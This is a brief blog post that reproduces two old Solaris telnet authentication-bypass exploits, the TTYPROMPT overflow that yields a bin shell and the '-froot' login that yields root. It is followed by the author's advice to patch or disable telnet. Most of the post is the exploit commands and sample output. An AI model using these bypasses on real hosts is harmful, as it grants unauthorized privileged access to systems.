http://www.milw0rm.com/exploits/57
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami bin
OR
http://weblog.infoworld.com/securityadviser/archives/2007/02/huge_easy_solar.html
telnet -l "-froot" [hostname]
Every once in a while I run across a box running telnet internally and feel compelled to at least try these two. If you are running telnet, which is bad enough, for god sake at least patch. (and put tcp wrappers, and iptables, etc...)
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment